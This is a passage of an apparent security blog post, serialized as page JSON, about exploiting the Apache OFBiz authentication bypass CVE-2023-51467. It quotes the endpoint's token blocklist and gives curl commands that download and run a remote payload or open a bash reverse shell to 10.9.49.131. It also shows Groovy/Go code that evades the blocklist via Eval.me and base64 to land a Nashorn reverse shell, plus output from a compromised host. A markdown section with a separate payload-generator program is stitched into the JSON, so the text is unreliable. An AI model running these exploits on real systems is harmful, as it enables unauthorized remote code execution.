",[47,82248,82251],{"href":82249,"rel":82250},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-9496",[51],"CVE-2020-9496",[47,82253,82256],{"href":82254,"rel":82255},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-29200",[51],"CVE-2021-29200"," has activity on ",[47,82259,11029],{"href":82260,"rel":82261},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fapache-ofbiz-deserialization-rce-attempt?days=1",[51],". OFBiz was also one of the first products to have a public Log4Shell ",[47,82264,22852],{"href":82265,"rel":82266},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002Fin9sPR2Bzt\u002Fcve-2021-44228-log4shell\u002Frapid7-analysis",[51],
This is why it only took a few days after the SonicWall disclosure for a couple of Chinese language blogs to suggest a ",[47,82275,82278],{"href":82276,"rel":82277},"https:\u002F\u002Fy4tacker.github.io\u002F2023\u002F12\u002F27\u002Fyear\u002F2023\u002F12\u002FApache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467\u002F",[51],"code execution endpoint",", and provide a ",[47,82281,11002],{"href":82282,"rel":82283},"https:\u002F\u002Fxz.aliyun.com\u002Ft\u002F13211",[51]," for command execution. The following image is from ",[47,82286,82289],{"href":82287,"rel":82288},"https:\u002F\u002Fxz.aliyun.com\u002Fu\u002F61082",[51],"RacerZ’s"," blog:",[18,82292,82293],{},[68,82294],{":width":10862,"alt":82295,"src":82296},"RacerZ proof of concept exploit for CVE-2023-51467","\u002Fblog\u002Fofbiz-cve-2023-51467\u002Fog-poc.png",[18,82298,82299,82300,82303,82304,82309,82310,82315],{},"As you can see, RacerZ was able to pop calc using the ",[886,82301,82302],{},"\u002Fwebtools\u002Fcontrol\u002FProgramExport"," endpoint alongside the authentication bypass (CVE-2023-51467). This endpoint executes ",[47,82305,82308],{"href":82306,"rel":82307},"https:\u002F\u002Fgroovy-lang.org\u002F",[51],"Groovy"," code provided by authenticated users. However, the endpoint is not intended to execute arbitrary Groovy. The code is passed through a blocklist of unacceptable values (which we’ll examine later). OFBiz developers appear to refer to this as a ",[47,82311,82314],{"href":82312,"rel":82313},"https:\u002F\u002Fissues.apache.org\u002Fjira\u002Fbrowse\u002FOFBIZ-12305",[51],"sandbox",", although that’s being a little liberal with the term. Either way, this “sandbox” is intended to prevent the uploading of webshells and other nefarious activities. This is, perhaps, why (before this blog) we haven’t seen a reverse shell or real weaponized exploit for this yet. 
Maybe the “sandbox” does its job?",[61,82317,82319],{"id":82318},"the-groovy-sandbox","The Groovy “Sandbox”",[18,82321,82322,82323,82328,82329,4606],{},"The “sandbox” blocks the ",[47,82324,82327],{"href":82325,"rel":82326},"https:\u002F\u002Fgithub.com\u002Fapache\u002Fofbiz-framework\u002Fblob\u002F9bd538be3eef75eba33ae1c40e88ba7f90b2bdce\u002Fframework\u002Fsecurity\u002Fconfig\u002Fsecurity.properties#L274",[51],"following strings"," from being included in the Groovy sent to ",[886,82330,82302],{},[1354,82332,82335],{"className":82333,"code":82334,"language":1359},[1357],"java.\nbeans\nfreemarker\n\u003Cscript\njavascript\n\u003Cbody\nbody\n\u003Cform\n\u003Cjsp:\n\u003Cc:out\ntaglib\n\u003Cprefix\n\u003C%@ page\n\u003C?php\nexec(\nalert(\n%eval\n@eval\neval(\nruntime\nimport\npassthru\nshell_exec\nassert\nstr_rot13\nsystem\ndecode\ninclude\npage\nchmod\nmkdir\nfopen\nfclose\nnew file\nupload\ngetfilename\ndownload\ngetoutputstring\nreadfile\niframe\nobject\nembed\nonload\nbuild\npython\nperl\n\u002Fperl\nruby\n\u002Fruby\nprocess\nfunction\nclass\nInputStream\nto_server\nwget\nstatic\nassign\nwebappPath\nifconfig\nroute\ncrontab\nnetstat\nuname\nhostname\niptables\nwhoami\n\"cmd\"\n*cmd|\n+cmd|\n=cmd|\nlocalhost\nthread\nrequire\ngzdeflate\n",[886,82336,82334],{"__ignoreMap":219},[18,82338,82339,82340,1246,82342,1246,82344,82346,82347,82349,82350,82352,82353,82356],{},"A lot of the entries are focused on webshells or individual commands (",[886,82341,22876],{},[886,82343,22814],{},[886,82345,1553],{},"). But there ",[1131,82348,1133],{}," two blocked items that are devastating to an attacker who just wants to execute arbitrary Groovy\u002FJava. That’s ",[886,82351,19043],{},", which prevents the attacker from importing any Java library, and ",[886,82354,82355],{},"java."," which prevents the attacker from using any Java classes that were auto-imported via Groovy.",[18,82358,82359,82360,82362,82363,82365],{},"This “sandbox” is not perfect, though. 
For example, they blocked ",[886,82361,1553],{}," but not ",[886,82364,1557],{},". An attacker that doesn’t mind touching disk can simply do the following:",[1354,82367,82369],{"className":31740,"code":82368,"language":2186,"meta":219,"style":219},"curl -kv -H \"Host: localhost:8443\" \\\n-d \"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='curl http:\u002F\u002F10.9.49.131\u002Fpayload -o \u002Ftmp\u002Fx.sh; bash \u002Ftmp\u002Fx.sh';x.execute();\" \\\n\"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino\"\n",[886,82370,82371,82390,82404],{"__ignoreMap":219},[1373,82372,82373,82375,82378,82381,82383,82386,82388],{"class":1375,"line":1376},[1373,82374,1557],{"class":2206},[1373,82376,82377],{"class":2209}," -kv",[1373,82379,82380],{"class":2209}," -H",[1373,82382,4883],{"class":1387},[1373,82384,82385],{"class":1391},"Host: localhost:8443",[1373,82387,183],{"class":1387},[1373,82389,76033],{"class":2326},[1373,82391,82392,82395,82397,82400,82402],{"class":1375,"line":220},[1373,82393,82394],{"class":4640},"-d ",[1373,82396,183],{"class":1387},[1373,82398,82399],{"class":1391},"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='curl http:\u002F\u002F10.9.49.131\u002Fpayload -o \u002Ftmp\u002Fx.sh; bash \u002Ftmp\u002Fx.sh';x.execute();",[1373,82401,183],{"class":1387},[1373,82403,76033],{"class":2326},[1373,82405,82406,82408,82411],{"class":1375,"line":1266},[1373,82407,183],{"class":1387},[1373,82409,82410],{"class":1391},"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino",[1373,82412,19057],{"class":1387},[18,82414,82415],{},"If the target is modern-ish Linux, you can easily get a bash reverse shell as well:",[1354,82417,82419],{"className":31740,"code":82418,"language":2186,"meta":219,"style":219},"curl -kv -H \"Host: localhost:8443\" \\\n-d 
\"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 \u002Fdev\u002Ftcp\u002F10.9.49.131\u002F1270 0>%261;';x.execute();\" \\\n\"https:\u002F\u002F10.9.49.121:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino\"\n",[886,82420,82421,82437,82450],{"__ignoreMap":219},[1373,82422,82423,82425,82427,82429,82431,82433,82435],{"class":1375,"line":1376},[1373,82424,1557],{"class":2206},[1373,82426,82377],{"class":2209},[1373,82428,82380],{"class":2209},[1373,82430,4883],{"class":1387},[1373,82432,82385],{"class":1391},[1373,82434,183],{"class":1387},[1373,82436,76033],{"class":2326},[1373,82438,82439,82441,82443,82446,82448],{"class":1375,"line":220},[1373,82440,82394],{"class":4640},[1373,82442,183],{"class":1387},[1373,82444,82445],{"class":1391},"groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 \u002Fdev\u002Ftcp\u002F10.9.49.131\u002F1270 0>%261;';x.execute();",[1373,82447,183],{"class":1387},[1373,82449,76033],{"class":2326},[1373,82451,82452,82454,82456],{"class":1375,"line":1266},[1373,82453,183],{"class":1387},[1373,82455,82410],{"class":1391},[1373,82457,19057],{"class":1387},[18,82459,82460],{},"For an advanced attacker, though, these payloads aren’t ideal. They touch disk and rely on Linux-specific behavior. It’s important to note that OFBiz can also run on Windows, so any payload that doesn’t account for that is sort of half-cocked. A better solution would support both Windows and Linux and avoid touching system files. Essentially, a Java-based solution would be ideal. 
But as we talked about above, the sandbox is fairly effective at blocking Java, so we have to find a way around the block list.",[61,82462,82464],{"id":82463},"bypassing-the-groovy-sandbox","Bypassing the Groovy “Sandbox”",[18,82466,82467,82468,1255,82470,82472,82473,82475,82476,82481,82482,1246,82485,1246,82488,1255,82491,82494,82495,1246,82498,1255,82501,82504,82505,82508],{},"To execute arbitrary Java, we need to overcome the inability to use ",[886,82469,19043],{},[886,82471,82355],{}," It’s pretty standard to hide exploit code in a different encoding (e.g. base64), but the blocklist also blocks ",[886,82474,27659],{},", so we are in sort of a rough spot to start out.\nLuckily, OFBiz does not block the ",[47,82477,82480],{"href":82478,"rel":82479},"https:\u002F\u002Fdocs.groovy-lang.org\u002Flatest\u002Fhtml\u002Fapi\u002Fgroovy\u002Futil\u002FEval.html",[51],"groovy.util.Eval"," functions. ",[886,82483,82484],{},"Eval.me",[886,82486,82487],{},"Eval.x",[886,82489,82490],{},"Eval.xy",[886,82492,82493],{},"Eval.xyz"," are all available because the OFBiz blocks only prevent ",[886,82496,82497],{},"%eval",[886,82499,82500],{},"@eval",[886,82502,82503],{},"eval(",". That means that we can build a string and then execute it using one of the ",[886,82506,82507],{},"Eval"," functions.",[18,82510,82511,82512,82515],{},"Consider the following examples. 
The first example just demonstrates how ",[886,82513,82514],{},"decodeBase64()"," is used in Groovy.",[1354,82517,82521],{"className":82518,"code":82519,"language":82520,"meta":219,"style":219},"language-groovy shiki shiki-themes material-theme-lighter github-light github-dark monokai","println(new String('aGVsbG8gd29ybGQh'.decodeBase64()))\n","groovy",[886,82522,82523],{"__ignoreMap":219},[1373,82524,82525,82528,82530,82532,82534,82536,82538,82541,82543,82545,82548,82550],{"class":1375,"line":1376},[1373,82526,82527],{"class":1379},"println",[1373,82529,1384],{"class":4640},[1373,82531,15523],{"class":4636},[1373,82533,27253],{"class":7293},[1373,82535,1384],{"class":4640},[1373,82537,1388],{"class":1387},[1373,82539,82540],{"class":1391},"aGVsbG8gd29ybGQh",[1373,82542,1388],{"class":1387},[1373,82544,59],{"class":1397},[1373,82546,82547],{"class":4640},"decodeBase64",[1373,82549,7514],{"class":1383},[1373,82551,16761],{"class":4640},[18,82553,82554,82555,982,82557,82562,82563,31686],{},"The above code would be blocked by OFBiz. 
However, using ",[886,82556,82484],{},[47,82558,82561],{"href":82559,"rel":82560},"http:\u002F\u002Fgroovy-lang.org\u002Fsyntax.html#_string_interpolation",[51],"string interpolation"," we can execute the equivalent code (both print ",[886,82564,82565],{},"hello world!",[1354,82567,82569],{"className":82518,"code":82568,"language":82520,"meta":219,"style":219},"x=\"'aGVsbG8gd29ybGQh'.de\"\nprintln(new String(Eval.me(\"${x}codeBase64()\")))\n",[886,82570,82571,82585],{"__ignoreMap":219},[1373,82572,82573,82576,82578,82580,82583],{"class":1375,"line":1376},[1373,82574,82575],{"class":4640},"x",[1373,82577,5417],{"class":1397},[1373,82579,183],{"class":1387},[1373,82581,82582],{"class":1391},"'aGVsbG8gd29ybGQh'.de",[1373,82584,19057],{"class":1387},[1373,82586,82587,82589,82591,82593,82595,82597,82599,82601,82604,82606,82608,82612,82615,82617,82620,82622,82624],{"class":1375,"line":220},[1373,82588,82527],{"class":1379},[1373,82590,1384],{"class":4640},[1373,82592,15523],{"class":4636},[1373,82594,27253],{"class":7293},[1373,82596,1384],{"class":4640},[1373,82598,82507],{"class":7293},[1373,82600,59],{"class":1397},[1373,82602,82603],{"class":4640},"me",[1373,82605,1384],{"class":1383},[1373,82607,183],{"class":1387},[1373,82609,82611],{"class":82610},"slF1C","${",[1373,82613,82575],{"class":82614},"s-euU",[1373,82616,28575],{"class":82610},[1373,82618,82619],{"class":1391},"codeBase64()",[1373,82621,183],{"class":1387},[1373,82623,2230],{"class":1383},[1373,82625,16761],{"class":4640},[18,82627,82628,82629,82631,82632,82634],{},"OFBiz doesn’t see ",[886,82630,27659],{}," because we split the string and then used string interpolation to recombine the statement in the ",[886,82633,82484],{}," method. In this way, we can execute any Groovy\u002FJava that we want because we can hide anything in the base64 encoded data. 
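To make the bypass concrete, here is an added Go example, written for this page and not taken from VulnCheck’s exploit or from OFBiz, that models the ProgramExport blocklist as a case-insensitive substring scan (an assumption about how the real check behaves, not a transcription of it) and builds the same Eval.me wrapper described above. The denied-token list is a subset copied from the security.properties excerpt earlier on this page, and the inner Nashorn program fed to it is constructed sample input.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// deniedTokens is a subset of the deniedWebShellTokens list quoted above,
// copied here so the example runs offline. The full list lives in OFBiz's
// security.properties.
var deniedTokens = []string{
	"java.", "beans", "freemarker", "<script", "exec(", "%eval", "@eval", "eval(",
	"runtime", "import", "system", "decode", "include", "upload", "download",
	"process", "function", "class", "InputStream", "wget", "crontab", "netstat",
	"whoami", "localhost", "thread", "require",
}

// BlockedTokens models the ProgramExport "sandbox" as a case-insensitive
// substring scan over the submitted Groovy. Treating the real check as a
// plain contains() test is an assumption of this example, not OFBiz code.
// It returns every denied token that appears in the program.
func BlockedTokens(groovy string) []string {
	lowered := strings.ToLower(groovy)
	var hits []string
	for _, tok := range deniedTokens {
		if strings.Contains(lowered, strings.ToLower(tok)) {
			hits = append(hits, tok)
		}
	}
	return hits
}

// WrapForEval hides an arbitrary Groovy program in base64 and rebuilds
// "decodeBase64()" through string interpolation inside Eval.me, the same
// shape as the blog's groovyPayload line. The blocklist only ever sees the
// wrapper; "decode", "import" and "java." stay inside the encoded blob.
//
// Caveat: base64 output can by chance spell a short denied word such as
// "wget" or "class", and the substring scan would then reject a wrapper
// that is otherwise clean. Prepending whitespace to the source shifts the
// base64 alignment, so all three possible alignments are tried first.
func WrapForEval(groovy string) (string, error) {
	for pad := 0; pad < 3; pad++ {
		src := strings.Repeat("\n", pad) + groovy
		b64 := base64.StdEncoding.EncodeToString([]byte(src))
		wrapped := fmt.Sprintf(`x="'%s'.de";Eval.me(new String(Eval.me("${x}codeBase64()")));`, b64)
		if len(BlockedTokens(wrapped)) == 0 {
			return wrapped, nil
		}
	}
	return "", errors.New("no alignment of the base64 blob is free of denied tokens")
}

func main() {
	// Constructed sample inner program: the Nashorn bootstrap, which trips
	// "import" and "eval(" when submitted directly.
	inner := `import javax.script.*;
ScriptEngine engine = new ScriptEngineManager().getEngineByName("nashorn");
engine.eval("print('hello world')");`

	fmt.Println("direct submission blocked by:", BlockedTokens(inner))
	wrapped, err := WrapForEval(inner)
	if err != nil {
		panic(err)
	}
	fmt.Println("wrapped submission blocked by:", BlockedTokens(wrapped))
	// This string is the value to send as the groovyProgram form parameter.
	fmt.Println("groovyProgram=" + wrapped)
}
```

Running it reports that the direct submission is caught by `eval(` and `import`, while the wrapped submission matches nothing on the list. The returned string is the raw `groovyProgram` value; when it goes into a form body, the `+` and `=` characters that base64 produces have to be percent-encoded (the curl examples above already escape `&` as `%26` for the same reason), otherwise the server decodes a different blob. The alignment loop exists because a substring blocklist is as happy to reject an accidental `wget` inside a base64 blob as a real one, which is a failure mode a one-off payload generator will eventually hit.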
The question is, what do we want to use for a payload?",[61,82636,82638],{"id":82637},"nashorn-reverse-shell","Nashorn Reverse Shell",[18,82640,82641,82642,82647,82648,10515,82653,82658],{},"If your goal is to execute a bespoke implant only from memory, there are no good options for Java. It’s entirely possible, and ",[47,82643,82646],{"href":82644,"rel":82645},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-javapayload\u002Fblob\u002Fmaster\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fjavapayload\u002Fstage\u002FMeterpreter.java",[51],"Java Meterpreter"," comes very close, but ultimately ",[47,82649,82652],{"href":82650,"rel":82651},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-payloads\u002Fblob\u002F6143148e22337c7b2ff93aeb67e492022bb148f8\u002Fjava\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L101",[51],"touches",[47,82654,82657],{"href":82655,"rel":82656},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-payloads\u002Fblob\u002F6143148e22337c7b2ff93aeb67e492022bb148f8\u002Fjava\u002Fjavapayload\u002Fsrc\u002Fmain\u002Fjava\u002Fmetasploit\u002FPayload.java#L83",[51],"disk",". So any “in memory only” attack has to be custom developed.",[18,82660,82661,82662,82665,82666,82669],{},"However, if you are willing to spawn processes from ",[886,82663,82664],{},"java.exe",", then a Nashorn reverse shell is a good bespoke in-memory payload. ",[47,82667,74241],{"href":74239,"rel":82668},[51]," is (was) the JavaScript engine in Java, so it can execute arbitrary JavaScript (with Java extensions - similar to Groovy) without being compiled to Java bytecode. 
That means we can provide the JavaScript\u002FJava as a string as part of our exploit - a pretty ideal situation.",[18,82671,82672],{},"Invoking Nashorn in Groovy\u002FJava is easy.",[1354,82674,82676],{"className":27194,"code":82675,"language":27196,"meta":219,"style":219},"import javax.script.*;\n\nScriptEngineManager factory = new ScriptEngineManager();\nScriptEngine engine = factory.getEngineByName(\"nashorn\");\ntry {\n    engine.eval(\"print('hello world')\");\n}\ncatch (final ScriptException se) {\n  se.printStackTrace();\n}\n",[886,82677,82678,82697,82701,82718,82747,82754,82774,82778,82798,82809],{"__ignoreMap":219},[1373,82679,82680,82682,82686,82689,82691,82693,82695],{"class":1375,"line":1376},[1373,82681,19043],{"class":5387},[1373,82683,82685],{"class":82684},"sAzHV"," javax",[1373,82687,59],{"class":82688},"sW3yT",[1373,82690,8249],{"class":82684},[1373,82692,59],{"class":82688},[1373,82694,35613],{"class":6761},[1373,82696,4912],{"class":1383},[1373,82698,82699],{"class":1375,"line":220},[1373,82700,6520],{"emptyLinePlaceholder":237},[1373,82702,82703,82706,82709,82711,82713,82716],{"class":1375,"line":1266},[1373,82704,82705],{"class":27228},"ScriptEngineManager",[1373,82707,82708],{"class":4640}," factory ",[1373,82710,5417],{"class":1397},[1373,82712,15283],{"class":4636},[1373,82714,82715],{"class":7297}," ScriptEngineManager",[1373,82717,15603],{"class":1383},[1373,82719,82720,82723,82726,82728,82731,82733,82736,82738,82740,82743,82745],{"class":1375,"line":1852},[1373,82721,82722],{"class":27228},"ScriptEngine",[1373,82724,82725],{"class":4640}," engine ",[1373,82727,5417],{"class":1397},[1373,82729,82730],{"class":4640}," 
factory",[1373,82732,59],{"class":1383},[1373,82734,82735],{"class":7297},"getEngineByName",[1373,82737,1384],{"class":1383},[1373,82739,183],{"class":1387},[1373,82741,82742],{"class":1391},"nashorn",[1373,82744,183],{"class":1387},[1373,82746,4680],{"class":1383},[1373,82748,82749,82752],{"class":1375,"line":4692},[1373,82750,82751],{"class":4636},"try",[1373,82753,4765],{"class":1383},[1373,82755,82756,82759,82761,82763,82765,82767,82770,82772],{"class":1375,"line":4724},[1373,82757,82758],{"class":4640},"    engine",[1373,82760,59],{"class":1383},[1373,82762,1380],{"class":7297},[1373,82764,1384],{"class":1383},[1373,82766,183],{"class":1387},[1373,82768,82769],{"class":1391},"print('hello world')",[1373,82771,183],{"class":1387},[1373,82773,4680],{"class":1383},[1373,82775,82776],{"class":1375,"line":4756},[1373,82777,1855],{"class":1383},[1373,82779,82780,82783,82785,82788,82791,82794,82796],{"class":1375,"line":4768},[1373,82781,82782],{"class":4636},"catch",[1373,82784,4641],{"class":1383},[1373,82786,82787],{"class":4652},"final",[1373,82789,82790],{"class":27228}," ScriptException",[1373,82792,82793],{"class":19096}," se",[1373,82795,2230],{"class":1383},[1373,82797,4765],{"class":1383},[1373,82799,82800,82803,82805,82807],{"class":1375,"line":4792},[1373,82801,82802],{"class":4640},"  se",[1373,82804,59],{"class":1383},[1373,82806,28056],{"class":7297},[1373,82808,15603],{"class":1383},[1373,82810,82811],{"class":1375,"line":4798},[1373,82812,1855],{"class":1383},[18,82814,82815,82816,82820],{},"The above prints out “hello world”. 
VulnCheck’s ",[47,82817,20558],{"href":82818,"rel":82819},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F4512b2abf38a5dff19d8f07da028ee01bbb01c9a\u002Fpayload\u002Freverse.go#L81",[51]," framework implements a complete Nashorn (or jjs) reverse shell that supports TLS encryption and automatically detects whether the victim host is running Windows or Linux.",[18,82822,82823,82824,82829,82830,82833],{},"We’ve shared an ",[47,82825,82828],{"href":82826,"rel":82827},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-51467",[51],"exploit on GitHub"," that uses ",[47,82831,20558],{"href":14297,"rel":82832},[51]," to exploit the OFBiz authentication bypass, bypass the blocklist, and then land a Nashorn payload for a reverse shell. The bulk of the payload generation is fairly trivial: the Nashorn bootstrap is base64-encoded, and the Groovy wrapper splits the string decodeBase64 across two literals so the blocklist never sees the method name, evaluates the concatenation to recover the bootstrap source, and then hands that source to Eval.me:",[1354,82835,82837],{"className":19022,"code":82836,"language":19024,"meta":219,"style":219},"nashorn := fmt.Sprintf(`import javax.script.*;\n\n   ScriptEngineManager factory = new ScriptEngineManager();\n   ScriptEngine engine = factory.getEngineByName(\"nashorn\");\n   try {\n       engine.eval(new java.lang.String(java.util.Base64.decoder.decode(\"%s\")));\n   } catch (final ScriptException se) { se.printStackTrace(); }`, payload.ReverseShellJJSScript(conf.Lhost, conf.Lport, true))\n\ngroovyPayload := fmt.Sprintf(`groovyProgram=x=\"'%s'.de\";Eval.me(new String(Eval.me(\"${x}codeBase64()\")));`, b64.StdEncoding.EncodeToString([]byte(nashorn)))\n",[886,82838,82839,82861,82865,82870,82875,82880,82890,82928,82932],{"__ignoreMap":219},[1373,82840,82841,82844,82846,82849,82851,82854,82856,82858],{"class":1375,"line":1376},[1373,82842,82843],{"class":4640},"nashorn ",[1373,82845,20584],{"class":1397},[1373,82847,82848],{"class":4640}," fmt",[1373,82850,59],{"class":1383},[1373,82852,82853],{"class":7297},"Sprintf",[1373,82855,1384],{"class":1383},[1373,82857,19169],{"class":1387},[1373,82859,82860],{"class":1391},"import 
javax.script.*;\n",[1373,82862,82863],{"class":1375,"line":220},[1373,82864,6520],{"emptyLinePlaceholder":237},[1373,82866,82867],{"class":1375,"line":1266},[1373,82868,82869],{"class":1391},"   ScriptEngineManager factory = new ScriptEngineManager();\n",[1373,82871,82872],{"class":1375,"line":1852},[1373,82873,82874],{"class":1391},"   ScriptEngine engine = factory.getEngineByName(\"nashorn\");\n",[1373,82876,82877],{"class":1375,"line":4692},[1373,82878,82879],{"class":1391},"   try {\n",[1373,82881,82882,82885,82887],{"class":1375,"line":4724},[1373,82883,82884],{"class":1391},"       engine.eval(new java.lang.String(java.util.Base64.decoder.decode(\"",[1373,82886,38048],{"class":37971},[1373,82888,82889],{"class":1391},"\")));\n",[1373,82891,82892,82895,82897,82899,82901,82903,82906,82908,82910,82912,82914,82916,82918,82920,82922,82924,82926],{"class":1375,"line":4756},[1373,82893,82894],{"class":1391},"   } catch (final ScriptException se) { se.printStackTrace(); }",[1373,82896,19169],{"class":1387},[1373,82898,5437],{"class":1383},[1373,82900,37845],{"class":4640},[1373,82902,59],{"class":1383},[1373,82904,82905],{"class":7297},"ReverseShellJJSScript",[1373,82907,1384],{"class":1383},[1373,82909,38107],{"class":4640},[1373,82911,59],{"class":1383},[1373,82913,38239],{"class":4640},[1373,82915,5437],{"class":1383},[1373,82917,20633],{"class":4640},[1373,82919,59],{"class":1383},[1373,82921,38248],{"class":4640},[1373,82923,5437],{"class":1383},[1373,82925,14986],{"class":14985},[1373,82927,16761],{"class":1383},[1373,82929,82930],{"class":1375,"line":4768},[1373,82931,6520],{"emptyLinePlaceholder":237},[1373,82933,82934,82937,82939,82941,82943,82945,82947,82949,82952,82954,82957,82959,82961,82964,82966,82969,82971,82974,82977,82980,82982,82984],{"class":1375,"line":4792},[1373,82935,82936],{"class":4640},"groovyPayload 
",[1373,82938,20584],{"class":1397},[1373,82940,82848],{"class":4640},[1373,82942,59],{"class":1383},[1373,82944,82853],{"class":7297},[1373,82946,1384],{"class":1383},[1373,82948,19169],{"class":1387},[1373,82950,82951],{"class":1391},"groovyProgram=x=\"'",[1373,82953,38048],{"class":37971},[1373,82955,82956],{"class":1391},"'.de\";Eval.me(new String(Eval.me(\"${x}codeBase64()\")));",[1373,82958,19169],{"class":1387},[1373,82960,5437],{"class":1383},[1373,82962,82963],{"class":4640}," b64",[1373,82965,59],{"class":1383},[1373,82967,82968],{"class":4640},"StdEncoding",[1373,82970,59],{"class":1383},[1373,82972,82973],{"class":7297},"EncodeToString",[1373,82975,82976],{"class":1383},"([]",[1373,82978,82979],{"class":7293},"byte",[1373,82981,1384],{"class":1383},[1373,82983,82742],{"class":4640},[1373,82985,82986],{"class":1383},")))\n",[18,82988,82989],{},"Throwing it at an OFBiz install on Windows generates the following shell.",[1354,82991,82993],{"className":31740,"code":82992,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2023-51467$ .\u002Fbuild\u002Fcve-2023-51467_linux-arm64 -a -e -rhost 10.9.49.99 -rport 8443 -lhost 10.9.49.131 -lport 1270\ntime=2024-01-08T15:08:25.984-05:00 level=STATUS msg=\"Certificate not provided. 
Generating a TLS Certificate\"\ntime=2024-01-08T15:08:26.239-05:00 level=STATUS msg=\"Starting TLS listener on 10.9.49.131:1270\"\ntime=2024-01-08T15:08:26.239-05:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.99 port=8443 ssl=false \"ssl auto\"=true\ntime=2024-01-08T15:08:26.271-05:00 level=STATUS msg=\"Sending an SSL reverse shell payload for port 10.9.49.131:1270\"\ntime=2024-01-08T15:08:26.271-05:00 level=STATUS msg=\"Throwing exploit at https:\u002F\u002F10.9.49.99:8443\u002Fwebtools\u002Fcontrol\u002FProgramExport\u002F\"\ntime=2024-01-08T15:08:27.753-05:00 level=SUCCESS msg=\"Caught new shell from 10.9.49.99:53519\"\ntime=2024-01-08T15:08:27.754-05:00 level=STATUS msg=\"Active shell from 10.9.49.99:53519\"\n\nMicrosoft Windows [Version 10.0.22000.2416]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Users\\albinolobster\\Downloads\\apache-ofbiz-18.12.10\\apache-ofbiz-18.12.10>whoami\nwhoami\nalbinolobst9bd8\\albinolobster\n",[886,82994,82995,83026,83051,83077,83136,83162,83187,83213,83239,83243,83254,83272,83276,83285,83289],{"__ignoreMap":219},[1373,82996,82997,83000,83003,83005,83007,83009,83012,83014,83017,83019,83022,83024],{"class":1375,"line":1376},[1373,82998,82999],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2023-51467$",[1373,83001,83002],{"class":1391}," .\u002Fbuild\u002Fcve-2023-51467_linux-arm64",[1373,83004,74504],{"class":2209},[1373,83006,38907],{"class":2209},[1373,83008,38910],{"class":2209},[1373,83010,83011],{"class":5467}," 10.9.49.99",[1373,83013,45568],{"class":2209},[1373,83015,83016],{"class":5467}," 8443",[1373,83018,38916],{"class":2209},[1373,83020,83021],{"class":5467}," 
10.9.49.131",[1373,83023,38922],{"class":2209},[1373,83025,38925],{"class":5467},[1373,83027,83028,83030,83032,83035,83037,83039,83041,83043,83045,83047,83049],{"class":1375,"line":220},[1373,83029,38930],{"class":4640},[1373,83031,5417],{"class":1397},[1373,83033,83034],{"class":1391},"2024-01-08T15:08:25.984-05:00",[1373,83036,38938],{"class":4640},[1373,83038,5417],{"class":1397},[1373,83040,38943],{"class":1391},[1373,83042,38946],{"class":4640},[1373,83044,5417],{"class":1397},[1373,83046,183],{"class":1387},[1373,83048,45631],{"class":1391},[1373,83050,19057],{"class":1387},[1373,83052,83053,83055,83057,83060,83062,83064,83066,83068,83070,83072,83075],{"class":1375,"line":1266},[1373,83054,38930],{"class":4640},[1373,83056,5417],{"class":1397},[1373,83058,83059],{"class":1391},"2024-01-08T15:08:26.239-05:00",[1373,83061,38938],{"class":4640},[1373,83063,5417],{"class":1397},[1373,83065,38943],{"class":1391},[1373,83067,38946],{"class":4640},[1373,83069,5417],{"class":1397},[1373,83071,183],{"class":1387},[1373,83073,83074],{"class":1391},"Starting TLS listener on 
10.9.49.131:1270",[1373,83076,19057],{"class":1387},[1373,83078,83079,83081,83083,83085,83087,83089,83091,83093,83095,83097,83099,83101,83103,83105,83107,83109,83111,83114,83116,83118,83121,83123,83125,83127,83129,83131,83133],{"class":1375,"line":1852},[1373,83080,38930],{"class":4640},[1373,83082,5417],{"class":1397},[1373,83084,83059],{"class":1391},[1373,83086,38938],{"class":4640},[1373,83088,5417],{"class":1397},[1373,83090,38943],{"class":1391},[1373,83092,38946],{"class":4640},[1373,83094,5417],{"class":1397},[1373,83096,183],{"class":1387},[1373,83098,38979],{"class":1391},[1373,83100,183],{"class":1387},[1373,83102,38984],{"class":4640},[1373,83104,5417],{"class":1397},[1373,83106,445],{"class":1391},[1373,83108,38991],{"class":4640},[1373,83110,5417],{"class":1397},[1373,83112,83113],{"class":1391},"10.9.49.99",[1373,83115,38999],{"class":4640},[1373,83117,5417],{"class":1397},[1373,83119,83120],{"class":1391},"8443",[1373,83122,39007],{"class":4640},[1373,83124,5417],{"class":1397},[1373,83126,5971],{"class":1391},[1373,83128,4883],{"class":1387},[1373,83130,39016],{"class":1391},[1373,83132,183],{"class":1387},[1373,83134,83135],{"class":1391},"=true\n",[1373,83137,83138,83140,83142,83145,83147,83149,83151,83153,83155,83157,83160],{"class":1375,"line":4692},[1373,83139,38930],{"class":4640},[1373,83141,5417],{"class":1397